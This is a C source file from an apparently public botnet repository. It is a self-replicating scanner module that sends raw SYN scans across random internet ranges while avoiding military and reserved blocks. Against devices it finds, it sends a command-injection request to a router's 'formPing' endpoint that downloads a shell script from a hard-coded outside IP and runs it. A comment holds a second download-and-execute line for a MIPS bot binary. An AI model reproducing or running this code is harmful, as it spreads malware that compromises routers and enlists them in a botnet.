Path: blob/master/Botnets/Self Reps/Netlink/netlink.c
5038 views
#ifdef SELFREP12#define _GNU_SOURCE34#ifdef DEBUG5#include <stdio.h>6#endif7#include <unistd.h>8#include <stdlib.h>9#include <sys/socket.h>10#include <arpa/inet.h>11#include <sys/select.h>12#include <sys/types.h>13#include <time.h>14#include <fcntl.h>15#include <signal.h>16#include <errno.h>17#include <string.h>18#include <linux/ip.h>19#include <linux/tcp.h>2021#include "includes.h"22#include "netlink.h"23#include "table.h"24#include "rand.h"25#include "util.h"26#include "checksum.h"2728int netlink_scanner_pid = 0, netlink_rsck = 0, netlink_rsck_out = 0, netlink_auth_table_len = 0;29char netlink_scanner_rawpkt[sizeof(struct iphdr) + sizeof(struct tcphdr)] = {0};30struct netlink_scanner_auth *netlink_auth_table = NULL;31struct netlink_scanner_connection *conn_table;32uint16_t netlink_netlink_auth_table_max_weight = 0;33uint32_t netlink_fake_time = 0;34int netlink_range[] = {181,178,62,213,178,170,181,101,119};3536int netlink_recv_strip_null(int sock, void *buf, int len, int flags)37{38int ret = recv(sock, buf, len, flags);3940if(ret > 0)41{42int i = 0;4344for(i = 0; i < ret; i++)45{46if(((char *)buf)[i] == 0x00)47{48((char *)buf)[i] = 'A';49}50}51}5253return ret;54}5556void netlink_scanner(void)57{58int i = 0, x;59uint16_t source_port;60struct iphdr *iph;61struct tcphdr *tcph;626364netlink_scanner_pid = fork();65if(netlink_scanner_pid > 0 || netlink_scanner_pid == -1)66return;6768LOCAL_ADDR = util_local_addr();6970rand_init();71netlink_fake_time = time(NULL);72conn_table = calloc(netlink_SCANNER_MAX_CONNS, sizeof(struct netlink_scanner_connection));73for(i = 0; i < netlink_SCANNER_MAX_CONNS; i++)74{75conn_table[i].state = netlink_SC_CLOSED;76conn_table[i].fd = -1;77conn_table[i].credential_index = 0;78}7980// Set up raw socket scanning and payload81if((netlink_rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)82{83#ifdef DEBUG84printf("[Netlink] failed to initialize raw socket, cannot scan\n");85#endif86exit(0);87}88fcntl(netlink_rsck, F_SETFL, O_NONBLOCK | fcntl(netlink_rsck, F_GETFL, 0));89i = 1;90if(setsockopt(netlink_rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) != 0)91{92#ifdef DEBUG93printf("[Netlink] failed to set IP_HDRINCL, cannot scan\n");94#endif95close(netlink_rsck);96exit(0);97}9899do100{101source_port = rand_next() & 0xffff;102}103while(ntohs(source_port) < 1024);104105iph = (struct iphdr *)netlink_scanner_rawpkt;106tcph = (struct tcphdr *)(iph + 1);107108// Set up IPv4 header109iph->ihl = 5;110iph->version = 4;111iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr));112iph->id = rand_next();113iph->ttl = 64;114iph->protocol = IPPROTO_TCP;115116// Set up TCP header117tcph->dest = htons(1723);118tcph->source = source_port;119tcph->doff = 5;120tcph->window = rand_next() & 0xffff;121tcph->syn = TRUE;122123#ifdef DEBUG124printf("[Netlink] scanner process initialized. scanning started.\n");125#endif126127// Main logic loop128while(TRUE)129{130fd_set fdset_rd, fdset_wr;131struct netlink_scanner_connection *conn;132struct timeval tim;133int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;134135// Spew out SYN to try and get a response136if(netlink_fake_time != last_spew)137{138last_spew = netlink_fake_time;139140for(i = 0; i < netlink_SCANNER_RAW_PPS; i++)141{142struct sockaddr_in paddr = {0};143struct iphdr *iph = (struct iphdr *)netlink_scanner_rawpkt;144struct tcphdr *tcph = (struct tcphdr *)(iph + 1);145146iph->id = rand_next();147iph->saddr = LOCAL_ADDR;148iph->daddr = get_random_netlink_ip();149iph->check = 0;150iph->check = checksum_generic((uint16_t *)iph, sizeof(struct iphdr));151152tcph->dest = htons(1723);153tcph->seq = iph->daddr;154tcph->check = 0;155tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof(struct tcphdr)), sizeof(struct tcphdr));156157paddr.sin_family = AF_INET;158paddr.sin_addr.s_addr = iph->daddr;159paddr.sin_port = tcph->dest;160161sendto(netlink_rsck, netlink_scanner_rawpkt, sizeof(netlink_scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof(paddr));162}163}164165// Read packets from raw socket to get SYN+ACKs166last_avail_conn = 0;167while(TRUE)168{169int n = 0;170char dgram[1514];171struct iphdr *iph = (struct iphdr *)dgram;172struct tcphdr *tcph = (struct tcphdr *)(iph + 1);173struct netlink_scanner_connection *conn;174175errno = 0;176n = recvfrom(netlink_rsck, dgram, sizeof(dgram), MSG_NOSIGNAL, NULL, NULL);177if(n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)178break;179180if(n < sizeof(struct iphdr) + sizeof(struct tcphdr))181continue;182if(iph->daddr != LOCAL_ADDR)183continue;184if(iph->protocol != IPPROTO_TCP)185continue;186if(tcph->source != htons(1723))187continue;188if(tcph->dest != source_port)189continue;190if(!tcph->syn)191continue;192if(!tcph->ack)193continue;194if(tcph->rst)195continue;196if(tcph->fin)197continue;198if(htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)199continue;200201conn = NULL;202for(n = last_avail_conn; n < netlink_SCANNER_MAX_CONNS; n++)203{204if(conn_table[n].state == netlink_SC_CLOSED)205{206conn = &conn_table[n];207last_avail_conn = n;208break;209}210}211212// greets to anyone seeing this new private selfrep by w00dy :p213if(conn == NULL)214break;215216conn->dst_addr = iph->saddr;217conn->dst_port = tcph->source;218netlink_setup_connection(conn);219}220221FD_ZERO(&fdset_rd);222FD_ZERO(&fdset_wr);223224for(i = 0; i < netlink_SCANNER_MAX_CONNS; i++)225{226int timeout = 5;227228conn = &conn_table[i];229//timeout = (conn->state > netlink_netlink_SC_CONNECTING ? 30 : 5);230231if(conn->state != netlink_SC_CLOSED && (netlink_fake_time - conn->last_recv) > timeout)232{233#ifdef DEBUG234printf("[Netlink] FD%d timed out (state = %d)\n", conn->fd, conn->state);235#endif236237close(conn->fd);238conn->fd = -1;239conn->state = netlink_SC_CLOSED;240free(conn->credentials);241conn->credential_index = 0;242util_zero(conn->rdbuf, sizeof(conn->rdbuf));243244continue;245}246247if(conn->state == netlink_netlink_SC_CONNECTING || conn->state == netlink_SC_EXPLOIT_STAGE2 || conn->state == netlink_SC_EXPLOIT_STAGE3)248{249FD_SET(conn->fd, &fdset_wr);250if(conn->fd > mfd_wr)251mfd_wr = conn->fd;252}253else if(conn->state != netlink_SC_CLOSED)254{255FD_SET(conn->fd, &fdset_rd);256if(conn->fd > mfd_rd)257mfd_rd = conn->fd;258}259}260261tim.tv_usec = 0;262tim.tv_sec = 1;263nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);264netlink_fake_time = time(NULL);265266for(i = 0; i < netlink_SCANNER_MAX_CONNS; i++)267{268conn = &conn_table[i];269270if(conn->fd == -1)271continue;272273if(FD_ISSET(conn->fd, &fdset_wr))274{275int err = 0, ret = 0;276socklen_t err_len = sizeof(err);277278ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);279if(err == 0 && ret == 0)280{281282if(conn->state == netlink_SC_EXPLOIT_STAGE2)283{284#ifdef DEBUG285printf("[Netlink] FD%d request sent to %d.%d.%d.%d\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);286#endif287288// build stage 2 payload might needa change this payload format cd /tmp; wget http://15.235.163.157/bins/666.mips; chmod 777 666.mips; ./666.mips NetLink.Rep289util_strcpy(conn->payload_buf, "GET /boaform/admin/formPing?target_addr=;wget%20http://20.90.115.58/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\n\r\n");290291// actually send the payload292send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);293294// clear the payload buffer295util_zero(conn->payload_buf, sizeof(conn->payload_buf));296297// clear the socket buffer298util_zero(conn->rdbuf, sizeof(conn->rdbuf));299300conn->state = netlink_SC_CLOSED;301close(conn->fd);302conn->fd = -1;303304continue;305}306else if(conn->state == netlink_SC_EXPLOIT_STAGE3)307{308conn->state = netlink_SC_CLOSED;309310continue;311}312else313{314conn->credentials = malloc(256);315conn->state = netlink_SC_EXPLOIT_STAGE2;316}317}318else319{320#ifdef DEBUG321printf("[Netlink] FD%d error while connecting = %d\n", conn->fd, err);322#endif323324close(conn->fd);325conn->fd = -1;326conn->state = netlink_SC_CLOSED;327328continue;329}330}331332if(FD_ISSET(conn->fd, &fdset_rd))333{334while(TRUE)335{336int ret = 0;337338if(conn->state == netlink_SC_CLOSED)339break;340close(conn->fd);341342if(conn->rdbuf_pos == netlink_SCANNER_RDBUF_SIZE)343{344memmove(conn->rdbuf, conn->rdbuf + netlink_SCANNER_HACK_DRAIN, netlink_SCANNER_RDBUF_SIZE - netlink_SCANNER_HACK_DRAIN);345conn->rdbuf_pos -= netlink_SCANNER_HACK_DRAIN;346}347348errno = 0;349ret = netlink_recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, netlink_SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);350if(ret == 0)351{352#ifdef DEBUG353printf("[Netlink] FD%d connection gracefully closed (stage %d)\n", conn->fd, conn->state);354#endif355errno = ECONNRESET;356ret = -1;357}358if(ret == -1)359{360if(errno != EAGAIN && errno != EWOULDBLOCK)361{362if(conn->state == netlink_SC_EXPLOIT_STAGE2)363{364#ifdef DEBUG365printf("[Netlink] FD%d resetting connection preparing to continue with stage 2 of the exploit\n", conn->fd);366#endif367close(conn->fd);368netlink_setup_connection(conn);369continue;370}371372close(conn->fd);373conn->fd = -1;374conn->state = netlink_SC_CLOSED;375free(conn->credentials);376conn->credential_index = 0;377util_zero(conn->rdbuf, sizeof(conn->rdbuf));378}379break;380}381382conn->rdbuf_pos += ret;383conn->last_recv = netlink_fake_time;384385int len = util_strlen(conn->rdbuf);386conn->rdbuf[len] = 0;387388if(conn->state == netlink_SC_GET_CREDENTIALS)389{390char *out = strtok(conn->rdbuf, " ");391392while(out != NULL)393{394if(strstr(out, ""))395{396#ifdef DEBUG397printf("[Netlink] FD%d parsing credentials...\n", conn->fd);398#endif399400memmove(out, out + 11, strlen(out));401402int i = 0;403404for(i = 0; i < strlen(out); i++)405{406if(out[i] == ';' || out[i] == '"' || out[i] == ' ')407out[i] = 0;408}409410conn->credentials[conn->credential_index] = strdup(out);411conn->credential_index++;412413}414415out = strtok(NULL, " ");416}417}418419if(conn->credentials[0] == NULL && conn->credentials[1] == NULL)420{421#ifdef DEBUG422printf("[Netlink] FD%d failed to retrieve credentials\n", conn->fd);423#endif424close(conn->fd);425conn->fd = -1;426conn->state = netlink_SC_CLOSED;427free(conn->credentials);428conn->credential_index = 0;429util_zero(conn->rdbuf, sizeof(conn->rdbuf));430}431else432{433#ifdef DEBUG434printf("[Netlink] FD%d retrieved user: %s, pass: %s changing exploit stages\n", conn->fd, conn->credentials[0], conn->credentials[1]);435#endif436437close(conn->fd);438conn->fd = -1;439conn->state = netlink_SC_EXPLOIT_STAGE2;440conn->credential_index = 0;441util_zero(conn->rdbuf, sizeof(conn->rdbuf));442}443}444}445}446}447}448449void netlink_kill(void)450{451kill(netlink_scanner_pid, 9);452}453454static void netlink_setup_connection(struct netlink_scanner_connection *conn)455{456struct sockaddr_in addr = {0};457458if(conn->fd != -1)459close(conn->fd);460461if((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)462{463#ifdef DEBUG464printf("[Netlink] failed to call socket()\n");465#endif466return;467}468469conn->rdbuf_pos = 0;470util_zero(conn->rdbuf, sizeof(conn->rdbuf));471472fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));473474addr.sin_family = AF_INET;475addr.sin_addr.s_addr = conn->dst_addr;476addr.sin_port = conn->dst_port;477478conn->last_recv = netlink_fake_time;479480if(conn->state == netlink_SC_EXPLOIT_STAGE2 || conn->state == netlink_SC_EXPLOIT_STAGE3)481{482}483else484{485conn->state = netlink_netlink_SC_CONNECTING;486}487488connect(conn->fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));489}490491static ipv4_t get_random_netlink_ip(void)492{493uint32_t tmp;494uint8_t o1 = 0, o2 = 0, o3 = 0, o4 = 0;495496do497{//netlink_range498tmp = rand_next();499srand(time(NULL));500501int dcock = rand() % (sizeof(netlink_range)/sizeof(char *));502503o1 = netlink_range[dcock];504o2 = (tmp >> 8) & 0xff;505o3 = (tmp >> 16) & 0xff;506o4 = (tmp >> 24) & 0xff;507}508while(o1 == 127 || // 127.0.0.0/8 - Loopback509(o1 == 0) || // 0.0.0.0/8 - Invalid address space510(o1 == 3) || // 3.0.0.0/8 - General Electric Company511(o1 == 15 || o1 == 16) || // 15.0.0.0/7 - Hewlett-Packard Company512(o1 == 56) || // 56.0.0.0/8 - US Postal Service513(o1 == 10) || // 10.0.0.0/8 - Internal network514(o1 == 192 && o2 == 168) || // 192.168.0.0/16 - Internal network515(o1 == 172 && o2 >= 16 && o2 < 32) || // 172.16.0.0/14 - Internal network516(o1 == 100 && o2 >= 64 && o2 < 127) || // 100.64.0.0/10 - IANA NAT reserved517(o1 == 169 && o2 > 254) || // 169.254.0.0/16 - IANA NAT reserved518(o1 == 198 && o2 >= 18 && o2 < 20) || // 198.18.0.0/15 - IANA Special use519(o1 >= 224) || // 224.*.*.*+ - Multicast520(o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense521);522523return INET_ADDR(o1,o2,o3,o4);524}525526#endif527528529530